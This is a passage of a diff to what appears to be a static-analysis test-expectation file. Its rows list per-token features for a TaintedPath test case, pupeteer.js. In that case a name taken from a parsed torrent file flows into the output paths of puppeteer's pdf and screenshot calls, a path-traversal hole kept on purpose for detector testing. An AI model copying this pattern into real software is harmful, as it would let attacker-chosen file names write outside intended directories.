autogenerated/TaintedPath/pupeteer.js:9:28:9:34 | tainted | enclosingFunctionName | | | autogenerated/TaintedPath/pupeteer.js:9:28:9:34 | tainted | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:42 | format | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:42 | format | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:42 | format | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:42 | format | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:42 | format | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:9:37:9:48 | format: 'a4' | fileImports | parse-torrent puppeteer | | autogenerated/TaintedPath/pupeteer.js:9:45:9:48 | 'a4' | CalleeFlexibleAccessPath | page.pdf | | autogenerated/TaintedPath/pupeteer.js:9:45:9:48 | 'a4' | InputAccessPathFromCallee | 0.format | | autogenerated/TaintedPath/pupeteer.js:9:45:9:48 | 'a4' | InputArgumentIndex | 0 | @@ -10445,6 +82945,151 @@ tokenFeatures | autogenerated/TaintedPath/pupeteer.js:9:45:9:48 | 'a4' | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | | autogenerated/TaintedPath/pupeteer.js:9:45:9:48 | 'a4' | enclosingFunctionName | | | autogenerated/TaintedPath/pupeteer.js:9:45:9:48 | 'a4' | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:15 | pages | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:15 | pages | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:15 | pages | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:15 | pages | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:15 | pages | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages = ... pages() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages = ... pages() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages = ... pages() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages = ... pages() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:11:11:39 | pages = ... pages() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:19:11:39 | await b ... pages() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:19:11:39 | await b ... pages() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:11:19:11:39 | await b ... pages() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:19:11:39 | await b ... pages() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:19:11:39 | await b ... pages() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:31 | browser | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:31 | browser | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:31 | browser | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:31 | browser | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:31 | browser | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:37 | browser.pages | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:37 | browser.pages | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:37 | browser.pages | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:37 | browser.pages | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:37 | browser.pages | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | browser.pages() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | browser.pages() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | browser.pages() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | browser.pages() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | browser.pages() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | exceptional return of browser.pages() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | exceptional return of browser.pages() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | exceptional return of browser.pages() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | exceptional return of browser.pages() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:25:11:39 | exceptional return of browser.pages() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:11:33:11:37 | pages | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:11:33:11:37 | pages | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:11:33:11:37 | pages | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:11:33:11:37 | pages | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:11:33:11:37 | pages | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:14 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:14 | i | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:14 | i | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:14 | i | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:14 | i | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i = 0 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i = 0 | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i = 0 | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i = 0 | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:14:12:18 | i = 0 | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:18:12:18 | 0 | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:18:12:18 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:18:12:18 | 0 | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:18:12:18 | 0 | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:18:12:18 | 0 | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:21 | i | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:35 | i < something() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:35 | i < something() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:35 | i < something() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:35 | i < something() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:21:12:35 | i < something() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:33 | something | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:33 | something | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:33 | something | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:33 | something | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:33 | something | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | exceptional return of something() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | exceptional return of something() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | exceptional return of something() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | exceptional return of something() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | exceptional return of something() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | something() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | something() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | something() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | something() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:25:12:35 | something() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:38 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:38 | i | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:38 | i | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:38 | i | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:38 | i | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i++ | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i++ | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i++ | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i++ | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:12:38:12:40 | i++ | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:13 | pages | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:13 | pages | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:13 | pages | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:13 | pages | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:13 | pages | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:16 | pages[i] | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:16 | pages[i] | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:16 | pages[i] | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:16 | pages[i] | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:16 | pages[i] | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:27 | pages[i].screenshot | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:27 | pages[i].screenshot | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:27 | pages[i].screenshot | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:27 | pages[i].screenshot | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:27 | pages[i].screenshot | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | exceptional return of pages[i ... nted }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | exceptional return of pages[i ... nted }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | exceptional return of pages[i ... nted }) | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | exceptional return of pages[i ... nted }) | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | exceptional return of pages[i ... nted }) | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | pages[i ... nted }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | pages[i ... nted }) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | pages[i ... nted }) | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | pages[i ... nted }) | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:9:13:46 | pages[i ... nted }) | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:15:13:15 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:15:13:15 | i | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:13:15:13:15 | i | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:15:13:15 | i | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:15:13:15 | i | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:18:13:27 | screenshot | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:18:13:27 | screenshot | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:13:18:13:27 | screenshot | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:18:13:27 | screenshot | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:18:13:27 | screenshot | fileImports | parse-torrent puppeteer | | autogenerated/TaintedPath/pupeteer.js:13:29:13:45 | { path: tainted } | CalleeFlexibleAccessPath | pages.?.screenshot | | autogenerated/TaintedPath/pupeteer.js:13:29:13:45 | { path: tainted } | InputArgumentIndex | 0 | | autogenerated/TaintedPath/pupeteer.js:13:29:13:45 | { path: tainted } | calleeImports | puppeteer | @@ -10453,6 +83098,21 @@ tokenFeatures | autogenerated/TaintedPath/pupeteer.js:13:29:13:45 | { path: tainted } | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | | autogenerated/TaintedPath/pupeteer.js:13:29:13:45 | { path: tainted } | enclosingFunctionName | | | autogenerated/TaintedPath/pupeteer.js:13:29:13:45 | { path: tainted } | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:34 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:34 | path | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:34 | path | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:34 | path | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:34 | path | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:13:31:13:43 | path: tainted | fileImports | parse-torrent puppeteer | | autogenerated/TaintedPath/pupeteer.js:13:37:13:43 | tainted | CalleeFlexibleAccessPath | pages.?.screenshot | | autogenerated/TaintedPath/pupeteer.js:13:37:13:43 | tainted | InputAccessPathFromCallee | 0.path | | autogenerated/TaintedPath/pupeteer.js:13:37:13:43 | tainted | InputArgumentIndex | 0 | @@ -10463,24 +83123,177 @@ tokenFeatures | autogenerated/TaintedPath/pupeteer.js:13:37:13:43 | tainted | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | | autogenerated/TaintedPath/pupeteer.js:13:37:13:43 | tainted | enclosingFunctionName | | | autogenerated/TaintedPath/pupeteer.js:13:37:13:43 | tainted | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:16:5:16:25 | await b ... close() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:16:5:16:25 | await b ... close() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:16:5:16:25 | await b ... close() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:16:5:16:25 | await b ... close() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:16:5:16:25 | await b ... close() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:17 | browser | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:17 | browser | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:17 | browser | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:17 | browser | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:17 | browser | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:23 | browser.close | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:23 | browser.close | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:23 | browser.close | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:23 | browser.close | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:23 | browser.close | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | browser.close() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | browser.close() | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | browser.close() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | browser.close() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | browser.close() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | exceptional return of browser.close() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | exceptional return of browser.close() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | exceptional return of browser.close() | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | exceptional return of browser.close() | enclosingFunctionName | | +| autogenerated/TaintedPath/pupeteer.js:16:11:16:25 | exceptional return of browser.close() | fileImports | parse-torrent puppeteer | +| autogenerated/TaintedPath/pupeteer.js:16:19:16:23 | close | contextFunctionInterfaces | | +| autogenerated/TaintedPath/pupeteer.js:16:19:16:23 | close | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/pupeteer.js:16:19:16:23 | close | enclosingFunctionBody | tainted dir/ parseTorrent torrent name .torrent.data browser puppeteer launch page browser newPage page pdf path tainted format a4 pages browser pages i 0 i something i pages i screenshot path tainted browser close | +| autogenerated/TaintedPath/pupeteer.js:16:19:16:23 | close | enclosingFunctionName | | +| 